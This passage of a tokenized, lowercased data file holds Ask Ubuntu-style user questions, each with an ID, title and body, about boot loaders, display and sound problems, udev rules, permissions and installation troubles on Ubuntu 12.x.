nvidia-settings again i can configurate it successfully again to be working at 1920x1080 . so i think the driver is correctly because the resolution is configureable and work as aspected , but during boot it does not load the correct values . anybody does know i can tell my system to use during boot the high resolution ?
234370	why i am taken to grub4dos when selecting ubuntu from the windows boatloader menu ?	i recently installed ubuntu 12.04.1 64x alongside windows 7 ( 32bit ) ( ubuntu after windows 7 ) on my pc . ubuntu installed properly without any errors . i installed grub on sda5 logical drive ( one mounted with /boot ) , and os on sda6 ( again logical ) ( mounted with / ) . when i rebooted it took me to windows as windows bootloader is in mbr , on first primary partition of disk . i added the entry for ubuntu with easybcd and when again rebooted there was an entry but i was taken to a prompt called grubfordos , which looks like grub rescue prompt . in windows c drive i found folder lst and one .mbr file created by easybcd i guess . i dont know whats gone wrong . please help . ps i ahve swap area of 8 gb on sda7 ( logical ) .
234371	install ubuntu on windows 8 with intel smart response	i have a dell inspiron 15z ( ultrabook ) with two drives , one hdd ( 500 go ) and one ssd ( 32 go ) managed by a kind of raid 0 array called intel smart response , and windows 8 already installed . dell allows the bios to disable the secure boot mode , but when i launch the ubuntu installer from a live cd , the install does not recognize any drive . so i tried , as read on the web , to deactivate intel smart response from the gui in windows 8 , and to set the sata mode to ahci or to ata ( i tried both ) . in both cases , it does not work . i just want to use ubuntu and remove ( if possible ) windows . what can i do ? should i format the bios and reinstall it from scratch ?
234377	activate hdmi port xubuntu 12.04	im trying to find a way to activate my hdmi port as when i plug my tv in it comes up with `` no signal present '' on my tv and i cant find it on the display tab is settings either . i have looked around but all the problems seem to be related to no sound and not to nothing happening . what can i do to activate it ? i have a asus eee pc x101 ch if thats any help .
234379	what does `` gtk-error ** : gtk+ 2.x symbols detected . '' mean ?	when starting gparted , it crashes with the error : gtk-error ** : gtk+ 2.x symbols detected . using gtk+ 2.x and gtk+ 3 in the same process is not supported i already opened lp bug # 1094354 for this . searching the internet for this error , i see that almost every linux distribution suffers from the same issue regarding this gtk+ 2.x/gtk+3 error for various other gtk-based programs too , e.g . gedit , gwibber , canberra-gtk , etc ... the gtk developers are claiming that it 's not a gtk bug . yet , no one on all the sites i 've googled has come up with an answer as to what this error message actually means . what is going on in a program to cause this error ? and what does this error mean in detail ?
234382	can i record playback with audacity without pulseaudio ?	i 'm trying to record output ( that what i can hear ) with audacity , but no sound recorded . i have found some instructions how to record with pulseaudio , but i have only alsa . i ca n't see any option in alsamixer or audacity . is it possible ? thanks !
234383	having a problem after installing mac-osx theme and setting it up with cairo dock	when i write sudo apt-get upgrade this message shows up : '' dpkg : error : can not scan updates directory `/var/lib/dpkg/updates/ ' : no such file or directory e : sub-process /usr/bin/dpkg returned an error code ( 2 ) '' any help ? !
234384	how to repair grub with live cd of different version of ubuntu	i have installed ubuntu 12.04 ( upgraded from 11.10 ) 32-bit and windows-7 64-bit simultaneously in my computer . i want to install windows-8 but i have n't any backup of ubuntu 12.04 to retrieve grub after installing windows . so , my question is : - is it possible to repair grub with different version of ubuntu live cd ? if possible then how could i do that and how risky that process ?
234401	path not working even after successfully modifying it	for some reason i am successful in adding new directories to my $ path but when i run the commands in the terminal the $ path does n't summon them . i modified the $ path in the ~/.bashrc file , and added the last directory # set the default system $ path : path= '' /usr/local/bin : /usr/bin : /bin : /usr/x11r6/bin : /usr/games : **/home/aldin/mybin/fasta-35.4.12/bin** '' but when i run the command it says command not found . however when i type the full path of the utility i 'm able to run it . has anyone experienced this problem before ? do you know what i can do to fix this problem ?
234403	creating own custom gnu/linux terminal emulator	i 've an idea about creating an open source project based on custom terminal emulator development for gnu/linux . i googled around but did n't find any source code for the native gnu/linux terminal emulator . can anyone guide me about where to start and where can i find the source code for native terminal .
234404	what to do if installation in virtual machine says `` no detected operating systems '' ?	i 'm installing ubuntu 12.10 in a virtual machine using virtualbox with windows 7 as the host os . one of the steps is to follow the regular installation procedure , but then i encountered a problem that says that there is no current os in my computer . the choices that i have are to erase disk or to create a partition . i 'm not sure what to do next . a screenshot of the installation step concerned is below :
234409	receive and send sms via pc	i am very interested in using ubuntu , but there is one question . am i able to send and receive sms via pc ?
234414	jhbuild sanitycheck not moving	i am following jhbuild documentation . while doing jhbuild sanitycheck i am getting following problem . root @ august : /home/frank/jhbuild # jhbuild sanitycheck you should not run jhbuild as root . root @ august : /home/frank/jhbuild # exit logout frank @ august : ~/jhbuild $ jhbuild sanitycheck jhbuild : working directory ( /opt/gnome/_jhbuild ) can not be created frank @ august : ~/jhbuild $ how i am supposed to move now ?
234416	how to remap the context menu to another key in linux ?	i just purchased a lenovo thinkpad and i am so proud of everything in it . it feels just as rock solid as the linux kernel : p. the problem is that lenovo decided to remove the context menu key that is the key that does the right click stuff . they replaced it by a print screen key . my keyboard has its numeric part with some buttons above it . there is a magnifying glass key that i would like to remap to open the context menu or be the right click key . is it possible to do this ? i 've tried searching for other related questions but i only found q & as on how to add options to the nautilus context menu . i want to to map a physical key of my keyboard to open this menu . just like before . it also appears that dell is dropping this key in their inspiron keyboard . i dont know whats going on since i use the keyboard more than mouse . thanks in advance .
234417	locked out of admin account ; but the password is right in shell ; password changed too !	i have a dual boot , win 7 and the latest lts 12.xx . i tried logging into my regular account but it keeps refusing to open . there is no message saying anything was incorrect , but that message still comes up if i type in gibberish as a password . i initially thought that changing password would help , even though i could access my files by using the correct one in shell through recovery mode . so i did change using 'passwd ' . but the result is the same . i can not open my desktop , just shell which i dont know too much about when it comes to transferring files between partitions side note : i made a guest account for people to use when i am not around without a password . but decided to put in a simple password later through the 'users ' ( i think thats the name ) program in the settings menu . but the changes did not take place and i am still unable to add the password even though everything runs fine while adding and adjusting priveleges . maybe the two things are related ? ? ?
234419	webcam problem in skype	webcam does n't work in my skype . i click to webcam button , but webcam does n't start . how can i fix it ?
234420	mousepad unresponsive on re-enabling with toggle key	the mouse pad does not respond when re-enabled using the toggle keys on acer aspire 5738zg . it responds when restarted from suspend though !
234422	error in installation	i had windows 7 starter on my netbook . i installed ubuntu 12.04 lts from a bootable usb drive and used `` something else '' option during installation . i used the windows 7 partition by mistake and now i cant load windows 7 from boot menu . . all my media files are in windows 7 . please suggest me a way to uninstall ubuntu to get back to windows 7 starter with all my media files intact .
234424	unable to download libtiff4_3.9.5-2ubuntu1.3_i386.deb and libcups2_1.5.3-0ubuntu4_i386.deb	for some reason , i ca n't seem to download steam beta on ubuntu xx.xx . it shows the following error messages : failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/c/cups/libcups2_1.5.3-0ubuntu4_i386.deb 404 not found [ ip : 91.189.91.15 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.5-2ubuntu1.3_i386.deb 404 not found [ ip : 91.189.91.15 80 ] though i can still connect to the internet and download other packages . is the server down ?
234428	monitor options	we recently upgraded to 12.04 on an oldish system that still has a crt monitor . we now find that certain panes wo n't fit the screen shape , probably due to the monitor type being set as 'widescreen laptop ' ... we ca n't change this as no other monitor type appears in the set-up list , evn when you use the 'find monitor ' option . any suggestions welcome !
234433	ubuntu 12.10 installation problem via usb	i had windows 7 , and i wanted to try ubuntu 12.10 . i downloaded the .iso file and used universal usb installer to make a bootable usb of ubuntu . the installation was successful . i restarted my laptop to complete the installation and then , i got a black screen with white letters showing : intel undi , pxe-2.1 ( build 083 ) copyright ( c ) 1997-2000 intel corporation this product is coverd by one or more of the following patents : us5 , 307,459 , us5,434,872 , us5,732,094 , us6,570,884 , us6,115,776 and us6 , 327 , 625 realtek pcie gbe familly controller series v2.35 ( 06/14/10 ) pxe-e61 : media test fallure , check cable pxe-m0f : exiting pxe rom . that message appears for about 2 seconds and the laptop restarts and this goes again and again . when i put my usb back and click on try ubuntu before installing , i can see that my hdd is not empty . i can see that ubuntu is installed , but wo n't start . also i check my bios and my priority for boot are set : hdd dvd usb pci lan my laptop is a lenovo b570 .
234440	how can i test if a variable matches another value and move to another function ?	i am writing a script where i store a predetermined line of text into a string ( we will call abc ) . i am storing the results from grep -iqs $ user file ( we will call def ) into another string . how can i test if $ abc matches content in $ def and if it does , move onto next function ? if it does not , prompt user for input . this is my attempt thus far : firstfunction ( ) { abc= '' $ user content '' ; # text stored as string def=`grep -iqs $ user /file` ; # results of grep stored to string if [ [ $ def = `` $ abc '' ] ] ; then # test if result from grep command matches text in secondfunction # string $ def . if true , move to secondfunction . if else # false , prompt user . echo `` message to user with a y/n prompt '' ; read prmt ; fi ; if [ [ $ prmt ! = `` y '' || $ prmt ! = `` n '' ] ] ; then prmt elif [ [ $ prmt == `` y '' ] ] ; then sed -i `` s/ $ def/ $ abc/g '' /file # if user chooses y at prompt , replace $ abc with $ def elif [ [ $ answer == `` n '' ] ] ; then # in file . if user chooses no at prompt , move to secondfunction # secondfunction . fi ; clear ; } ; environment titles have been changed but the concept behind the snippet should be clear .
234442	recoverfing files from windows 8	hello i just rushed into this install of ubuntu from windows 8 without doing enough research like i should have done , i 'm worried that i may have lost all of my files , i thought i would be able to get a dual boot system going automatically ( stupid of me i know ) anyways if i go back to windows 8 right now will my files still be there ?
234443	how stop ubuntu from reading my password out loud every time i log on ?	i turned on a certain feature on the login screen and now my password is read out loud when i type it on login . what did i turn on , and how do i turn this back off ?
234444	ubuntu 12.10 usb installation problems : (	i had windows 7 , and i wanted to try ubuntu 12.10 . i downloaded the .iso file and used universal usb installer to make a bootable usb of ubuntu . the installation was successful . i restarted my laptop to complete the installation and then , i got a black screen with white letters showing something like ok , i will write now the whole message : ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . intel undi , pxe-2.1 ( build 083 ) copyright ( c ) 1997-2000 intel corporation this product is coverd by one or more of the following patents : us5 , 307,459 , us5,434,872 , us5,732,094 , us6,570,884 , us6,115,776 and us6 , 327 , 625 realtek pcie gbe familly controller series v2.35 ( 06/14/10 ) pxe-e61 : media test fallure , check cable pxe-m0f : exiting pxe rom . ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... this is the message , and appears for about 2 sec and the laptop restarts and this goes again and again . when i put my usb back and click on try ubuntu before installing , i can see that my hdd is not empty . i can see that ubuntu is installed , but wont start . also i check my bios and my priority for boot are set 1.hdd 2.dvd 3.usb 4.pci lan my laptop is a lenovo b570 .
234445	install ubuntu 12.04 in vmware runing on windows 7 64 bit	so , my question is : i instaled vmware 8 on windows 7 , 64 bit and i tried to install ubuntu 12.04 in vmware as a guest os . installation was normal , but when ubuntu started to load i can see a massage `` installing wmvare tools , please wait ... and that 's it . could anyone help me ?
234446	bios time is incorrect	ok here 's a weird question . i have like , 7 year old hardware . i have ubuntu 12.10 installed . if i ever have a need to go into the bios , it 's showing the time incorrect - i think it 's showing it in gmt . i 'm in est . when i go into ubuntu , it reflects the time accurately in the os . if i correct the time in the bios and go into ubuntu then reboot into bios again , the time is once again set to gmt . is this normal behavior ?
234453	udev rule gets matched twice with a smartphone in storage mode	i have a problem with an udev-rule , that gets matched always twice when i connect my device . i would n't ask here if was not very sure that i made up an absolutely correct rule . i think the problem is not in the rule itself , but anyway , here is my rule : attrs { idvendor } == '' 18d1 '' , attrs { idproduct } == '' 4e21 '' , env { id_fs_type } == '' vfat '' , owner= '' ... me ... '' , symlink+= '' ... /nexus '' , run+= '' /home/ ... /myscript '' its a nexus s by google , which shall be backed up by rsync once i plug it in . this is done like that : phone gets connected and asks if it shall turn to storage mode , which i accept . now the first problem was , that i ca n't use something like action= '' add '' , since the device gets added by udev , while it does not yet provide the filesystem . i have to turn it in storage mode , udev triggers new events recognizing more information about the the filesystem ( e.g . beeing vfat ) . so , to not match my rule too early , i used the fs-type environment variable . the final device-node for the phones filesystem is ( in this case ) `` /dev/sdg '' ( without a number ! ) now the rule gets matched always twice , and when i monitor udev activity it says : kernel [ 33252.434094 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2 ( usb ) kernel [ 33252.434722 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0 ( usb ) kernel [ 33252.435005 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18 ( scsi ) kernel [ 33252.435139 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/scsi_host/host18 ( scsi_host ) udev [ 33252.448355 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2 ( usb ) udev [ 33252.450621 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0 ( usb ) udev [ 33252.452331 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18 ( scsi ) udev [ 33252.453618 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/scsi_host/host18 ( scsi_host ) kernel [ 33253.434071 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0 ( scsi ) kernel [ 33253.434133 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0 ( scsi ) kernel [ 33253.434289 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/scsi_disk/18:0:0:0 ( scsi_disk ) kernel [ 33253.434353 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/scsi_device/18:0:0:0 ( scsi_device ) kernel [ 33253.434396 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/scsi_generic/sg7 ( scsi_generic ) kernel [ 33253.434528 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/bsg/18:0:0:0 ( bsg ) udev [ 33253.435261 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0 ( scsi ) kernel [ 33253.436359 ] add /devices/virtual/bdi/8:96 ( bdi ) udev [ 33253.436418 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0 ( scsi ) kernel [ 33253.437187 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/block/sdg ( block ) udev [ 33253.437724 ] add /devices/virtual/bdi/8:96 ( bdi ) udev [ 33253.438335 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/scsi_disk/18:0:0:0 ( scsi_disk ) kernel [ 33253.438867 ] change /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/block/sdg ( block ) udev [ 33253.439476 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/scsi_device/18:0:0:0 ( scsi_device ) udev [ 33253.440782 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/scsi_generic/sg7 ( scsi_generic ) udev [ 33253.441059 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/bsg/18:0:0:0 ( bsg ) kernel [ 33253.446210 ] change /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/block/sdg ( block ) udev [ 33253.465723 ] add /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/block/sdg ( block ) udev [ 33253.489562 ] change /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/block/sdg ( block ) udev [ 33253.499913 ] change /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/block/sdg ( block ) and after activating storage mode : kernel [ 33311.201180 ] change /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/block/sdg ( block ) kernel [ 33311.231579 ] change /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/block/sdg ( block ) udev [ 33315.817190 ] change /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/block/sdg ( block ) udev [ 33315.885089 ] change /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/block/sdg ( block ) without really knowing what happens in the last two lines , their resemblance makes me think it might be a problem in udev repeating some events ... here is the output of udevadm info -q all -n /dev/ ... : p : /devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/block/sdg n : sdg s : christian/nexus s : disk/by-id/usb-google_file-cd_gadget_30309c8c04b300ec-0:0 s : disk/by-label/nexus_s s : disk/by-path/pci-0000:00:16.2-usb-0:2:1.0-scsi-0:0:0:0 s : disk/by-uuid/829d-18db e : devlinks=/dev/ ... /nexus /dev/disk/by-id/usb-google_file-cd_gadget_30309c8c04b300ec-0:0 /dev/disk/by-label/nexus_s /dev/disk/by-path/pci-0000:00:16.2-usb-0:2:1.0-scsi-0:0:0:0 /dev/disk/by-uuid/829d-18db e : devname=/dev/sdg e : devpath=/devices/pci0000:00/0000:00:16.2/usb3/3-2/3-2:1.0/host18/target18:0:0/18:0:0:0/block/sdg e : devtype=disk e : id_bus=usb e : id_fs_label=nexus_s e : id_fs_label_enc=nexus_s e : id_fs_type=vfat e : id_fs_usage=filesystem e : id_fs_uuid=829d-18db e : id_fs_uuid_enc=829d-18db e : id_fs_version=fat32 e : id_instance=0:0 e : id_media_player=google_nexus-s e : id_model=file-cd_gadget e : id_model_enc=file-cd\x20gadget\x20\x20 e : id_model_id=4e21 e : id_path=pci-0000:00:16.2-usb-0:2:1.0-scsi-0:0:0:0 e : id_path_tag=pci-0000_00_16_2-usb-0_2_1_0-scsi-0_0_0_0 e : id_revision=0000 e : id_serial=google_file-cd_gadget_30309c8c04b300ec-0:0 e : id_serial_short=30309c8c04b300ec e : id_type=disk e : id_usb_driver=usb-storage e : id_usb_interfaces=:080650 : e : id_usb_interface_num=00 e : id_vendor=google e : id_vendor_enc=google\x20\x20 e : id_vendor_id=18d1 e : major=8 e : minor=96 e : subsystem=block e : udev_log=3 e : udisks_presentation_icon_name=multimedia-player e : udisks_presentation_nopolicy=0 e : usec_initialized=33253437171 i have tried a lot of other combinations ( with e.g . kernel=.. ) . now i need help . every hint is much apreciated ! if you need more output ( like syslog ) , i 'll be glad to provide it ... # postscriptum : i think the problem is probably that the filesystem gets the device node for example `` sdg '' , and not `` sdg1 '' . other android smartphones seem to not show this problem , with an galaxy ace for ex. , everything was just fine ... the output of fdisk -l /dev/sdg ( with the nexus s ) : disk /dev/sdg : 14.3 gb , 14314094080 bytes 64 köpfe , 32 sektoren/spur , 13650 zylinder , zusammen 27957215 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes festplattenidentifikation : 0x00000000 gerät boot . anfang ende blöcke id system and then nothingness . anyway , i solved this for me by creating a pidfile and let the script check for it ...
234454	accidently deleted `` setup '' entry from samsung uefi boot menu . how to get it restored ?	i have a samsung np900x3c-a07de laptop . somehow , i 've managed to delete the `` setup '' uefi entry . can someone with the same notebook send me output of efibootmgr -v , so i can restore mine ?
234461	how can i ask for ubuntu theme settings if i 'm making an html app ?	the new gtk3 themes seem to be css/sass based , so the question is : how do i ask the browser for the current theme settings such that i can style buttons or other elements in a webpage to match the system theme ? if there 's no universal way , is there a userscript for chrome or firefox extension you can recommend that will grab this information from the os and push it in to the browser in some way that i can access from the web-app side ? edit : i appreciate the response from @ gertvdijk , but i more mean how i can grab the style for a particular element and apply it to some random div . if i were building a menu-system from a ul and li elements for example . how do i grab the appropriate style from the theme ( fg/bg from non text area ) would be a fitting example .
234462	fdisk -l not showing usb drive	i ran fdisk -l then i connected my usb drive to my computer and ran fdisk -l again but the list of drives did n't change at all . what can i do ?
234463	`` booting system without network configuration '' using a livecd created with remastersys	i have ubuntu 12.04 with kde . i have installed remastersys and made a livecd ( distribution ) burnet with k3b on a dvd ( 3.2gb ) , but i left the video card ati driver because i would use this livecd only on the computer in which i created it , so with the same gpu . the big problem is that while booting , the screen stays on : kubuntu 12.04 ... . `` booting system without network configuration '' , and nothing happens . i have tried to burn it again but same thing . surfing on google it seems to be a problem that other people had after upgrading from a ubuntu version to onother , but of course it 's not my case . hope someone could help me , thanks edit : so i think that my problem is about the .iso i created with remastersys , i do n't know what is wrong . that 's why i have followed the advices for making livecd from remastersys.com , it says : you should not install any proprietary video drivers like the nvidia or ati drivers as they will not be used on the livecd and users will have to reinstall them after installation . clean up history and cache and copy over the contents to /etc/skel but be sure to change the ownership of everything in /etc/skel to root . while the livecd/dvd is being created , you should not open any other apps or windows . do not under any circumstances enable auto login as it will cause the live user creation portion of casper to fail and you will not get to the desktop . i did all , the only thing i left is the video card driver . i have also cleaned the system with ubuntu tweak and after all these operations i created a backup .iso with remastersys and then a livecd .iso , i have tried them in virtualbox and at boot i can only see : '' isolinux 3.63 debian-2008-07-15 copyright âš 1994-2008 h. peter anvin boot : `` and virtualbox has given an error , so i 've burnt a dvd and same thing on my real pc . at least before doing these operations i could see the normal livecd screen of my distribution where i could choose what to do ( memtest , livecd , install distribution , boot hd etc ... ) , but now i ca n't . i have also read this : '' it is recommended to remove most media files and any virtual machine hard drives like the ones used by qemu , virtual box , etc off the system while you run the backup mode or make sure you add these files to the excludes in the /etc/remastersys.conf file either manually or through the gui . '' but i do n't understand how to do that
234466	how can i recover sudo permission ?	i am new to ubuntu . i have installed ubuntu 12.10 on a fujitsu amilo 1536 notebook , and it works just fine . to extract a tar archive i need root privileges but i ca n't get them . i ca n't use sudo because the user i use is not in the sudoers file ( although it 's an administrator account ) and i also ca n't edit the sudo list manually , because of insufficient privileges . root password is unknown to me as usual for ubuntu . any idea how to handle this ?
234468	unable to install steam 64bit - wrong architecture ( lubuntu 12.04 )	i 'm on a new install of lubuntu 12.04 on an acer aspire 5534 ( specifications here , tl ; dr : amd dual-core 64bit ) trying to install steam_latest.deb from the steam website . when i open gdebi to install , it tells me that it 's uninstallable because it 's for a i386 architecture . i 've tried installing ia32-libs ( installed , no success ) , gdebi -- add-architecture i386 ( with and without -- force , command unknown ) . this is all i 've found to fix the problem , but none of it has worked for me . any suggestions are welcome , thanks for your time .
234469	firefox showing some parts of websites grey	firefox at my ubuntu 12.10 ( 64bit ) desktop , started showing some parts of websites grey . i tried creating a new profile , nothing . tried unistall with sudo apt-get purge firefox which removed firefox and some other firefox-tied apps , re-installed , still nothing . this is how a page looks in firefox : and how it looks in chrome : notice the image , it 's a bit grey . i have also installed the old image style extension and it simply does n't work . what can i do ?
234470	how can i format my drive completely to prepare it for any os , not specifically ubuntu ?	i am sad to say it , but i am turning my back on ubuntu . one last thing i need to know though is how to nuke my hard drive . i have tried a couple sites , but they are all using ubuntu live cd 's , which i am assuming means they want to get rid of a standing os , white downloading ubuntu . what i need is the opposite . i just need to clear my hard drive , and have it ready for another os , but i would rather not say what kind . thanks to all of you in advance , and ubuntu will always have a special place in my cd rack ^-^
234477	no password set - how do i authenticate ?	i am running ubuntu 12.10 and have removed the password on my account . when i need to authenticate , the system does n't accept a blank box . how do i authenticate then ?
234485	sound issues : no sound in 12.10	i 'm currently having issues getting my sound to work . i 've read others have had luck with upgrading their kernel and i 've done that : noahc @ blackbox : ~ $ uname -r 3.7.0-030700-generic i get this for output : noahc @ blackbox : ~ $ sudo aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc269vc analog [ alc269vc analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i 've read that others have had luck with plugging in a set of headphones , which i have tried and had no such luck . any ideas on how to move forward with this ?
234487	external usb hard drive formatted e2fs/e3fs permissions	i am using ubuntu 12.04 on a laptop computer . i have an external usb disk drive formatted e2fs/e3fs by another linux system ( specifically a linksys nslu2 running stock linksys firmware ) . from the command line as a root user , i have used 'chmod 777 ' on the mount point to allow me to write around 400gb of files to this disk . when i move this usb disk drive back to the normal system the new files are visible in a directory listing , but not readable . this is because the file permissions have been screwed up ( my background is simple windows systems , so i know very little about linux file permissions ) . the files newly written by the laptop show the owner as 'username ' . older files written by the nslu2 ( the normal intended host for the disk drive ) and accessed correctly show the file owner as '501 ' , '1000 ' , '2000 ' etc . i have tried to use nautilus to change the file permissions to those expected , but nautilus will only allow me to select owner names from a pre-defined list , not including the ones that i want . when i try to add a user to the ubuntu system with the desired user name ( to allow nautilus to offer the correct choice ) i get an error message i do not understand - i suspect that ubuntu does not like these numeric usernames because a bit of research suggests that they are used for special purposes in other linux systems . how do i fix the file permissions on this external disk - specifically owner and group names ? thanks , peter
234496	how to recover flash drive lost after formatting with gparted ?	i was just copying audio files into my 2gb usb mp3 player , then i had a problem saying that it could not copy files into the drive any more , i tried removing it and trying again , but it did n't work , but the files already copied to the drive where working just fine and i was able to read them . but after the problem remaining i decided to format the drive using disks , but somehow this did n't work . when i choose to format the drive nothing happens and i get no error messages . so i tried gparted and it worked , i formatted the drive as fat32 but after this , the drive does n't show up , in ubuntu , disks , windows or even gparted . the drive is still working because its a mp3 reader , and when i try to use it just says that there are no files in it ( because of formatting it of course ) . there is any way i can restore my flash drive back ? any ideas will be very welcome : )
234498	what 's a recommended alternative to quickbooks pro ?	i 've just installed ubuntu to replace windows . i ca n't seem to find a good alternative to quickbooks pro to run on ubuntu . any help would be appreciated .
234499	how to reset hotspot key ?	i am new to ubuntu . i wanted to create a wifi hotspot from my wired connected laptop . i followed these instructions http : //www.howtogeek.com/116409/how-to-turn-your-ubuntu-laptop-into-a-wireless-access-point/ which worked quite well . ubuntu assigned a default wep key for this hotspot . i used it to connect another laptop i have and everything was fine . however , i decided to change the default key and its type from wep to wpa . i did this in the `` wireless security '' tab , pressed save and exited . i then tried once again to change the key and i was welcomed with : '' password or encryption keys are required to access the wireless network '' which was expected . what was unexpected was the fact that it does not let me through using the key i set just before . is it expecting the default key ? why if i had changed it ( and saved it ) ? now i get three or four windows with the same message every time i try to access . how can i reset this key ? why is it behaving this way ? i use ubuntu 12.10 on an asus laptop . ================== 00:00.0 host bridge [ 0600 ] : intel corporation core processor dram controller [ 8086:0044 ] ( rev 18 ) 00:01.0 pci bridge [ 0604 ] : intel corporation core processor pci express x16 root port [ 8086:0045 ] ( rev 18 ) 00:16.0 communication controller [ 0780 ] : intel corporation 5 series/3400 series chipset heci controller [ 8086:3b64 ] ( rev 06 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b3c ] ( rev 06 ) 00:1b.0 audio device [ 0403 ] : intel corporation 5 series/3400 series chipset high definition audio [ 8086:3b56 ] ( rev 06 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 1 [ 8086:3b42 ] ( rev 06 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 2 [ 8086:3b44 ] ( rev 06 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 3 [ 8086:3b46 ] ( rev 06 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 6 [ 8086:3b4c ] ( rev 06 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b34 ] ( rev 06 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev a6 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation mobile 5 series chipset lpc interface controller [ 8086:3b09 ] ( rev 06 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 5 series/3400 series chipset 4 port sata ahci controller [ 8086:3b29 ] ( rev 06 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 5 series/3400 series chipset smbus controller [ 8086:3b30 ] ( rev 06 ) 00:1f.6 signal processing controller [ 1180 ] : intel corporation 5 series/3400 series chipset thermal subsystem [ 8086:3b32 ] ( rev 06 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati robson ce [ amd radeon hd 6300 series ] [ 1002:68e4 ] 01:00.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati cedar hdmi audio [ radeon hd 5400/6300 series ] [ 1002 : aa68 ] 03:00.0 network controller [ 0280 ] : atheros communications inc. ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) 05:00.0 system peripheral [ 0880 ] : jmicron technology corp. sd/mmc host controller [ 197b:2382 ] ( rev 80 ) 05:00.2 sd host controller [ 0805 ] : jmicron technology corp. standard sd host controller [ 197b:2381 ] ( rev 80 ) 05:00.3 system peripheral [ 0880 ] : jmicron technology corp. ms host controller [ 197b:2383 ] ( rev 80 ) 05:00.4 system peripheral [ 0880 ] : jmicron technology corp. xd host controller [ 197b:2384 ] ( rev 80 ) 05:00.5 ethernet controller [ 0200 ] : jmicron technology corp. jmc250 pci express gigabit ethernet controller [ 197b:0250 ] ( rev 03 ) ff:00.0 host bridge [ 0600 ] : intel corporation core processor quickpath architecture generic non-core registers [ 8086:2c62 ] ( rev 05 ) ff:00.1 host bridge [ 0600 ] : intel corporation core processor quickpath architecture system address decoder [ 